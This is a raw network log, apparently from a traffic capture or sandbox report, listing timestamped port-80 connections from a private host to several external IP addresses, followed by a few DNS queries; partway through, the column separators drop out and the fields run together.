                    Sep 22, 2024 17:40:42.152343035 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733640909 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733659983 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733676910 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733692884 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733720064 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733741045 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733757973 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733778954 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733795881 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733819962 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.733874083 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.733884096 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.733916998 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.738723040 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.738780975 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.738799095 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.738842964 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.738858938 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.738976002 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.822258949 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.822277069 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.822293997 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.822427034 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.825417995 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.830194950 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:48.548603058 CEST | 49746 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:48.553531885 CEST | 80 | 49746 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:48.553838015 CEST | 49746 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:48.565804005 CEST | 49746 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:48.570698023 CEST | 80 | 49746 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:49.471364021 CEST | 80 | 49746 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:49.471829891 CEST | 80 | 49746 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:49.472166061 CEST | 49746 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:50.069233894 CEST | 49746 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:51.088486910 CEST | 49747 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:51.094405890 CEST | 80 | 49747 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:51.094674110 CEST | 49747 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:51.107100010 CEST | 49747 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:51.111984968 CEST | 80 | 49747 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:52.028733015 CEST | 80 | 49747 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:52.031514883 CEST | 80 | 49747 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:52.031569004 CEST | 49747 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:52.617018938 CEST | 49747 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:53.634721994 CEST | 49748 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:53.665875912 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.665977001 CEST | 49748 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:53.679172039 CEST | 49748 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:53.684777975 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.684809923 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.684839010 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.684874058 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.685358047 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.685385942 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.685412884 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.685440063 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:53.685467005 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:54.628940105 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:54.629522085 CEST | 80 | 49748 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:54.630810022 CEST | 49748 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:55.193260908 CEST | 49748 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:56.213056087 CEST | 49749 | 80 | 192.168.2.4 | 154.23.184.240
                    Sep 22, 2024 17:40:56.224380016 CEST | 80 | 49749 | 154.23.184.240 | 192.168.2.4
                    Sep 22, 2024 17:40:56.224478006 CEST4974980192.168.2.4154.23.184.240
                    Sep 22, 2024 17:40:56.233649969 CEST4974980192.168.2.4154.23.184.240
                    Sep 22, 2024 17:40:56.246754885 CEST8049749154.23.184.240192.168.2.4
                    Sep 22, 2024 17:40:57.181016922 CEST8049749154.23.184.240192.168.2.4
                    Sep 22, 2024 17:40:57.182080030 CEST8049749154.23.184.240192.168.2.4
                    Sep 22, 2024 17:40:57.183412075 CEST4974980192.168.2.4154.23.184.240
                    Sep 22, 2024 17:40:57.200798035 CEST4974980192.168.2.4154.23.184.240
                    Sep 22, 2024 17:40:57.206126928 CEST8049749154.23.184.240192.168.2.4
                    Sep 22, 2024 17:41:02.981733084 CEST4975080192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:02.993915081 CEST804975047.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:02.994235992 CEST4975080192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:03.006192923 CEST4975080192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:03.011465073 CEST804975047.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:04.175784111 CEST804975047.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:04.176367044 CEST804975047.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:04.176557064 CEST4975080192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:04.521637917 CEST4975080192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:05.540091991 CEST4975180192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:05.550369024 CEST804975147.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:05.550599098 CEST4975180192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:05.563085079 CEST4975180192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:05.568110943 CEST804975147.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:06.673520088 CEST804975147.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:06.673979044 CEST804975147.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:06.675894976 CEST4975180192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:07.068478107 CEST4975180192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:08.088577986 CEST4975280192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:08.094934940 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.095030069 CEST4975280192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:08.108371019 CEST4975280192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:08.114563942 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.114698887 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.114871025 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.114905119 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.115075111 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.115113974 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.115142107 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.115169048 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:08.115195990 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:09.615190029 CEST4975280192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:09.673906088 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:10.634437084 CEST4975380192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:10.649987936 CEST804975347.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:10.650238037 CEST4975380192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:10.658143997 CEST4975380192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:10.676630020 CEST804975347.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:11.746654987 CEST804975247.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:11.746706009 CEST4975280192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:11.892486095 CEST804975347.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:11.894937038 CEST804975347.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:11.894994974 CEST4975380192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:11.896099091 CEST4975380192.168.2.447.104.180.139
                    Sep 22, 2024 17:41:11.915604115 CEST804975347.104.180.139192.168.2.4
                    Sep 22, 2024 17:41:25.037317038 CEST4975480192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:25.043735981 CEST80497543.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:25.043843031 CEST4975480192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:25.057770967 CEST4975480192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:25.062681913 CEST80497543.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:25.534982920 CEST80497543.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:25.537878036 CEST4975480192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:26.568288088 CEST4975480192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:26.573471069 CEST80497543.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:27.589766979 CEST4975580192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:27.594933033 CEST80497553.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:27.595036030 CEST4975580192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:27.610074997 CEST4975580192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:27.614897013 CEST80497553.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:28.092916012 CEST80497553.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:28.093067884 CEST4975580192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:29.115343094 CEST4975580192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:29.125396013 CEST80497553.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.134903908 CEST4975680192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:30.141726017 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.141803026 CEST4975680192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:30.156694889 CEST4975680192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:30.176481009 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.176501989 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.176513910 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.176589012 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.176601887 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.176665068 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.176696062 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.176707983 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.176760912 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.630723953 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:30.632214069 CEST4975680192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:31.662002087 CEST4975680192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:31.669226885 CEST80497563.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:32.681049109 CEST4975780192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:32.686003923 CEST80497573.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:32.688992977 CEST4975780192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:32.696283102 CEST4975780192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:32.701030970 CEST80497573.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:33.165461063 CEST80497573.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:33.166573048 CEST80497573.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:33.166974068 CEST4975780192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:33.170686007 CEST4975780192.168.2.43.33.130.190
                    Sep 22, 2024 17:41:33.182673931 CEST80497573.33.130.190192.168.2.4
                    Sep 22, 2024 17:41:46.323151112 CEST4975880192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:46.328449011 CEST8049758199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:46.328577042 CEST4975880192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:46.343069077 CEST4975880192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:46.350481033 CEST8049758199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:46.915824890 CEST8049758199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:46.916270018 CEST8049758199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:46.916281939 CEST8049758199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:46.924343109 CEST4975880192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:47.849976063 CEST4975880192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:48.868462086 CEST4975980192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:48.873709917 CEST8049759199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:48.874100924 CEST4975980192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:48.889799118 CEST4975980192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:48.894789934 CEST8049759199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:49.394556046 CEST8049759199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:49.394926071 CEST8049759199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:49.394944906 CEST8049759199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:49.395064116 CEST4975980192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:50.396812916 CEST4975980192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:51.415929079 CEST4976080192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:51.420944929 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.421399117 CEST4976080192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:51.432990074 CEST4976080192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:51.437953949 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.437988043 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.438057899 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.438086033 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.438112974 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.438159943 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.438249111 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.438277006 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:51.438303947 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:52.520904064 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:52.520925999 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:52.520942926 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:52.520952940 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:52.520962954 CEST8049760199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:52.520986080 CEST4976080192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:52.521023989 CEST4976080192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:52.521070957 CEST4976080192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:52.943391085 CEST4976080192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:53.963648081 CEST4976180192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:53.968555927 CEST8049761199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:53.968631029 CEST4976180192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:53.977318048 CEST4976180192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:53.982206106 CEST8049761199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:54.448005915 CEST8049761199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:54.448029995 CEST8049761199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:54.448046923 CEST8049761199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:54.448143959 CEST4976180192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:54.450675964 CEST4976180192.168.2.4199.59.243.227
                    Sep 22, 2024 17:41:54.455601931 CEST8049761199.59.243.227192.168.2.4
                    Sep 22, 2024 17:41:59.507801056 CEST4976280192.168.2.4162.241.226.190
                    Sep 22, 2024 17:41:59.512716055 CEST8049762162.241.226.190192.168.2.4
                    Sep 22, 2024 17:41:59.512835026 CEST4976280192.168.2.4162.241.226.190
                    Sep 22, 2024 17:41:59.523307085 CEST4976280192.168.2.4162.241.226.190
                    Sep 22, 2024 17:41:59.528222084 CEST8049762162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:00.093818903 CEST8049762162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:00.093987942 CEST8049762162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:00.094038963 CEST4976280192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:01.076483965 CEST4976280192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:02.088821888 CEST4976380192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:02.093682051 CEST8049763162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:02.093770027 CEST4976380192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:02.115166903 CEST4976380192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:02.119992018 CEST8049763162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:02.976418972 CEST8049763162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:02.976448059 CEST8049763162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:02.976645947 CEST4976380192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:03.630867958 CEST4976380192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:04.650099993 CEST4976480192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:04.654881954 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.654968977 CEST4976480192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:04.667224884 CEST4976480192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:04.672055960 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.672071934 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.672097921 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.672110081 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.672123909 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.672261000 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.672275066 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.672327042 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:04.672339916 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:05.325282097 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:05.325392008 CEST8049764162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:05.325690985 CEST4976480192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:06.177664042 CEST4976480192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:07.197860956 CEST4976580192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:07.202709913 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:07.205935955 CEST4976580192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:07.213990927 CEST4976580192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:07.218750954 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:07.803864002 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:07.804009914 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:07.804050922 CEST4976580192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:07.814587116 CEST4976580192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:07.819328070 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:13.432712078 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:13.437668085 CEST804976691.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:13.438081980 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:13.451229095 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:13.456074953 CEST804976691.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:14.194087029 CEST804976691.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:14.195177078 CEST804976691.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:14.195271969 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:14.963695049 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:15.981947899 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:15.986963987 CEST804976791.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:15.987051964 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:15.999684095 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:16.004590034 CEST804976791.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:16.718717098 CEST804976791.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:16.718771935 CEST804976791.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:16.718947887 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:17.507911921 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:18.525505066 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:18.530539989 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.530672073 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:18.544348001 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:18.551230907 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551263094 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551314116 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551343918 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551371098 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551418066 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551445961 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551474094 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551501036 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:19.238317013 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:19.288645983 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:19.363653898 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:19.363728046 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:20.057183027 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.073820114 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.078857899 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.079135895 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.086118937 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.090980053 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791749001 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791809082 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791845083 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791878939 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791908979 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.791910887 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791954041 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.792001009 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792033911 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792040110 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.792066097 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792098999 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792108059 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.792131901 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792179108 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.799048901 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.799119949 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.799156904 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.799164057 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.799240112 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.802139044 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.807080984 CEST804976991.215.85.23192.168.2.4
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 22, 2024 17:39:45.755412102 CEST5437053192.168.2.41.1.1.1
                    Sep 22, 2024 17:39:45.766796112 CEST53543701.1.1.1192.168.2.4
                    Sep 22, 2024 17:39:50.774844885 CEST5511453192.168.2.41.1.1.1
                    Sep 22, 2024 17:39:50.786655903 CEST53551141.1.1.1192.168.2.4
                    Sep 22, 2024 17:39:55.807224989 CEST6042853192.168.2.41.1.1.1
                    Sep 22, 2024 17:39:56.250032902 CEST53604281.1.1.1192.168.2.4
                    Sep 22, 2024 17:40:12.666068077 CEST6530253192.168.2.41.1.1.1
                    Sep 22, 2024 17:40:12.676693916 CEST53653021.1.1.1192.168.2.4
                    Sep 22, 2024 17:40:20.743695021 CEST4991953192.168.2.41.1.1.1
                    Sep 22, 2024 17:40:20.924664021 CEST53499191.1.1.1192.168.2.4
                    Sep 22, 2024 17:40:34.369201899 CEST5399553192.168.2.41.1.1.1
                    Sep 22, 2024 17:40:34.488867044 CEST53539951.1.1.1192.168.2.4
                    Sep 22, 2024 17:40:47.838017941 CEST6199253192.168.2.41.1.1.1
                    Sep 22, 2024 17:40:48.542540073 CEST53619921.1.1.1192.168.2.4
